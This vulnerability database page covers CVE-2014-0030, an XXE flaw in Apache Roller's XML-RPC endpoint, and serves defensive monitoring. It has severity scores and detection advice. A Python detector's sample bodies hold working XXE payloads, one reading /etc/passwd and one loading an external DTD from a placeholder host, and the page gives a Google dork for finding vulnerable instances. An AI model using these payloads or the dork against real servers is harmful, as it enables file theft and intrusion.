cbcvebase.
CVE-2014-0030
published 2017-10-10

CVE-2014-0030: The XML-RPC protocol support in Apache Roller before 5.0.3 allows attackers to conduct XML External Entity (XXE) attacks via unspecified vectors.

Priority: P266
Severity: critical, CVSS 3.0 base score 9.8 (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)
Exploit: public exploit available
EPSS: 16.87% (96.7th percentile)
Affected (6 ranges)

Vendor    Product    Version range    Fixed in
apache    roller
apache    roller
apache    roller
apache    roller
apache    roller
apache    roller

Detection & IOCs (extracted from sources)

URL: /roller-services/xmlrpc
  • Monitor for unauthenticated or anomalous HTTP POST requests to the Apache Roller XML-RPC endpoint path /roller-services/xmlrpc, which is the attack delivery point for XXE payloads.
  • Inspect POST body content to /roller-services/xmlrpc for XML DOCTYPE declarations containing ENTITY definitions (e.g., &xxe; or %dtd; references), which are characteristic of XXE injection attempts.
  • Detect outbound HTTP callbacks from the server to attacker-controlled hosts triggered during XML parsing, indicative of the advanced out-of-band XXE variant used by this exploit.
  • Use the Google dork to identify exposed vulnerable Apache Roller instances: intext:"apache roller weblogger version {vulnerable_version_number}"
  • The vulnerability affects Apache Roller versions before 5.0.3; the exploit script targets the XML-RPC protocol support. Ensure the endpoint /roller-services/xmlrpc is disabled or access-controlled if upgrading is not immediately possible.
  • The exploit has two modes: a simple in-band file disclosure mode (reading files like /etc/passwd directly in the XML-RPC fault response) and an advanced out-of-band mode using an attacker-hosted DTD server, requiring detection coverage for both patterns.
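One way to implement the DOCTYPE/ENTITY inspection the bullets above call for, as an added Python example that is not part of this record or of Apache Roller; the endpoint path is the one given here, while the sample request bodies and the `.invalid` DTD host are constructed for the demonstration.

```python
import re

# Endpoint path named on this page (assumed to be the only Roller XML-RPC route).
XMLRPC_PATH = "/roller-services/xmlrpc"

# A legitimate XML-RPC call never needs a DOCTYPE, so any DOCTYPE is suspect.
DOCTYPE_RE = re.compile(r"<!DOCTYPE\b", re.IGNORECASE)
# <!DOCTYPE name SYSTEM "..."> pulls in a whole external DTD.
DOCTYPE_EXT_RE = re.compile(r"<!DOCTYPE\s+[\w.\-]+\s+(SYSTEM|PUBLIC)\b", re.IGNORECASE)
# <!ENTITY [%] name [SYSTEM|PUBLIC] ...: parameter (%dtd;) and external entities.
ENTITY_RE = re.compile(
    r"<!ENTITY\s+(?P<param>%)?\s*(?P<name>[\w.\-]+)\s+(?P<ext>SYSTEM|PUBLIC)?",
    re.IGNORECASE,
)
# A SYSTEM/PUBLIC identifier that is a URL means the parser will call out (OOB variant).
URL_REF_RE = re.compile(r"(?:SYSTEM|PUBLIC)\s+[\"'](?:https?|ftp)://", re.IGNORECASE)


def classify_xmlrpc_request(path: str, body: str) -> dict:
    """Classify one HTTP POST by path and raw body.
    severity: none (not the endpoint / no DOCTYPE), warn (DOCTYPE with only
    internal entities), alert (external or parameter entities, external DTD).
    """
    if path.split("?", 1)[0] != XMLRPC_PATH or not DOCTYPE_RE.search(body):
        return {"severity": "none", "reasons": []}
    reasons = ["doctype"]
    if DOCTYPE_EXT_RE.search(body):
        reasons.append("external-dtd")
    for m in ENTITY_RE.finditer(body):
        if m.group("param"):
            reasons.append("parameter-entity:%" + m.group("name"))
        if m.group("ext"):
            reasons.append("external-entity:" + m.group("name"))
    if URL_REF_RE.search(body):
        reasons.append("oob")  # parser would fetch a remote URL during parsing
    severity = "alert" if len(reasons) > 1 else "warn"
    return {"severity": severity, "reasons": reasons}


# Constructed sample bodies (not captured traffic) covering both modes the page describes.
SAMPLES = {
    "benign": "<?xml version='1.0'?><methodCall><methodName>blogger.getUsersBlogs"
              "</methodName><params/></methodCall>",
    "inband": "<?xml version='1.0'?><!DOCTYPE a [<!ENTITY xxe SYSTEM 'file:///etc/passwd'>]>"
              "<methodCall><methodName>&xxe;</methodName></methodCall>",
    "oob": "<?xml version='1.0'?><!DOCTYPE a [<!ENTITY % dtd SYSTEM "
           "'http://dtd.example.invalid/x.dtd'> %dtd;]><methodCall/>",
}
```

Run the body through the server's charset decoding before matching: these regexes operate on text, so a UTF-16 encoded body would slip past them unchanged.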

CVSS provenance

NVD, CVSS v3.0: 9.8 CRITICAL, CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
NVD, CVSS v2.0: 7.5 HIGH, AV:N/AC:L/Au:N/C:P/I:P/A:P